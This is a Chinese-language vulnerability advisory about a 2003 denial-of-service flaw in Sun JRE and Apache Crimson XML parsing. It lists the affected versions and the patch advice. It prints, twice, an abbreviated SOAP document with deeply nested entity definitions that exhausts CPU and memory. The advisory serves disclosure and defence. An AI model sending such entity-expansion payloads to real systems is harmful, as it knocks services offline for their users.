安全研究

安全漏洞
Sun Java XML文档嵌套实体拒绝服务攻击漏洞

发布日期:2003-09-22
更新日期:2003-09-27

受影响系统:
Sun JRE (Linux Production Release) 1.4.1_03
Sun JRE (Linux Production Release) 1.4.1_02
Sun JRE (Linux Production Release) 1.4.1_01
Sun JRE (Linux Production Release) 1.4.1
Sun JRE (Linux Production Release) 1.4.0_03
Sun JRE (Linux Production Release) 1.4.0_02
Sun JRE (Linux Production Release) 1.4
Sun JRE (Linux Production Release) 1.3.1_06
Sun JRE (Linux Production Release) 1.3.1_05
Sun JRE (Linux Production Release) 1.3.1_03
Sun JRE (Linux Production Release) 1.3.1_02
Sun JRE (Linux Production Release) 1.3.1_01
Sun JRE (Linux Production Release) 1.3.1
Sun JRE (Linux Production Release) 1.3.0_05
Sun JRE (Linux Production Release) 1.3.0_02
Sun JRE (Linux Production Release) 1.3.0
Sun JRE (Linux Production Release) 1.2.2_011
Sun JRE (Linux Production Release) 1.2.2_010
Sun JRE (Linux Production Release) 1.2.2_007
Sun JRE (Linux Production Release) 1.2.2_003
Sun JRE (Linux Production Release) 1.2.2
Sun JRE (Solaris Production Release) 1.4.1_03
Sun JRE (Solaris Production Release) 1.4.1_02
Sun JRE (Solaris Production Release) 1.4.1_01
Sun JRE (Solaris Production Release) 1.4.1
Sun JRE (Solaris Production Release) 1.4.0_03
Sun JRE (Solaris Production Release) 1.4
Sun JRE (Solaris Production Release) 1.3_05
Sun JRE (Solaris Production Release) 1.3.1_06
Sun JRE (Solaris Production Release) 1.3.1_05
Sun JRE (Solaris Production Release) 1.3.1_03
Sun JRE (Solaris Production Release) 1.3.1_02
Sun JRE (Solaris Production Release) 1.3.1_01
Sun JRE (Solaris Production Release) 1.3.0_02
Sun JRE (Solaris Production Release) 1.3
Sun JRE (Solaris Production Release) 1.2.2_11
Sun JRE (Solaris Production Release) 1.2.2_10
Sun JRE (Solaris Production Release) 1.2.2_07
Sun JRE (Solaris Production Release) 1.2.2_05a
Sun JRE (Solaris Production Release) 1.2.1
Sun JRE (Solaris Production Release) 1.2
Sun JRE (Solaris Production Release) 1.1.8_15
Sun JRE (Solaris Production Release) 1.1.8_14
Sun JRE (Solaris Production Release) 1.1.8_13
Sun JRE (Solaris Production Release) 1.1.8_10
Sun JRE (Solaris Production Release) 1.1.7B
Sun JRE (Windows Production Release) 1.4.1_03
Sun JRE (Windows Production Release) 1.4.1_02
Sun JRE (Windows Production Release) 1.4.1_01
Sun JRE (Windows Production Release) 1.4.1
Sun JRE (Windows Production Release) 1.4.0_03
Sun JRE (Windows Production Release) 1.4
Sun JRE (Windows Production Release) 1.3_05
Sun JRE (Windows Production Release) 1.3.1_06
Sun JRE (Windows Production Release) 1.3.1_05
Sun JRE (Windows Production Release) 1.3.1_03
Sun JRE (Windows Production Release) 1.3.1_02
Sun JRE (Windows Production Release) 1.3.1_01a
Sun JRE (Windows Production Release) 1.3.0_02
Sun JRE (Windows Production Release) 1.3
Sun JRE (Windows Production Release) 1.2.2_011
Sun JRE (Windows Production Release) 1.2.2_010
Sun JRE (Windows Production Release) 1.2.2_007
Sun JRE (Windows Production Release) 1.2.1
Sun JRE (Windows Production Release) 1.2
Sun JRE (Windows Production Release) 1.1.8_009
Sun JRE (Windows Production Release) 1.1.8_008
Sun JRE (Windows Production Release) 1.1.8_007
Apache Software Foundation Crimson 1.0
Sun JRE (Linux Production Release) 1.2.2_005
    - Debian Linux 2.2
    - Mandrake Linux 7.2
    - RedHat Linux 7.0
    - SuSE Linux 7.0
Sun JRE (Solaris Production Release) 1.1.6
    - Sun Solaris 8.0
    - Sun Solaris 7.0
    - Sun Solaris 2.6
不受影响系统:
Sun JRE (Linux Production Release) 1.4.2
Sun JRE (Solaris Production Release) 1.4.2
Sun JRE (Windows Production Release) 1.4.2
Apache Software Foundation Crimson 1.1
描述:
BUGTRAQ  ID: 8666

Sun Java 2 SDK是一款Java实现平台。

Sun Java当处理特殊构建的XML文档时存在问题,远程攻击者利用这个漏洞诱使用户访问恶意XML文档而使系统崩溃。

当XML不允许递归实体定义,而允许嵌套实体定义时,如果XML数据来自外部资源,就有可能产生拒绝服务攻击,如类似如下的SOAP文档包含深层嵌套实体定义,可导致消耗100%CPU时间和消耗大量内存:

<?xml version="1.0" encoding ="UTF-8"?> <!DOCTYPE foobar[ <!ENTITY x100 "foobar"> <!ENTITY  x99 "&x100;&x100;"> <!ENTITY  x98 "&x99;&x99;"> ... <!ENTITY   x2 "&x3;&x3;"> <!ENTITY   x1 "&x2;&x2;"> ]><SOAP-ENV:Envelope xmlns:SOAP-ENV=...><SOAP-ENV:Body><ns1:aaa xmlns:ns1="urn:aaa" SOAP-ENV:encodingStyle="..."><foobar xsi:type="xsd:string">&x1;</foobar></ns1:aaa></SOAP-ENV:Body></SOAP-ENV:Envelope>

<*来源:Sun Release Notes
  
  链接:http://java.sun.com/j2se/1.4.2/relnotes.html#JAXP_security
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

构建如下SOAP文档,诱使用户解析:

<?xml version="1.0" encoding ="UTF-8"?> <!DOCTYPE foobar[ <!ENTITY x100 "foobar"> <!ENTITY  x99 "&x100;&x100;"> <!ENTITY  x98 "&x99;&x99;"> ... <!ENTITY   x2 "&x3;&x3;"> <!ENTITY   x1 "&x2;&x2;"> ]><SOAP-ENV:Envelope xmlns:SOAP-ENV=...><SOAP-ENV:Body><ns1:aaa xmlns:ns1="urn:aaa" SOAP-ENV:encodingStyle="..."><foobar xsi:type="xsd:string">&x1;</foobar></ns1:aaa></SOAP-ENV:Body></SOAP-ENV:Envelope>

建议:
厂商补丁:

Sun
---
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载使用Java 2 SDK, Standard Edition:

http://java.sun.com/j2se/1.4.2/relnotes.html

浏览次数:3256
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障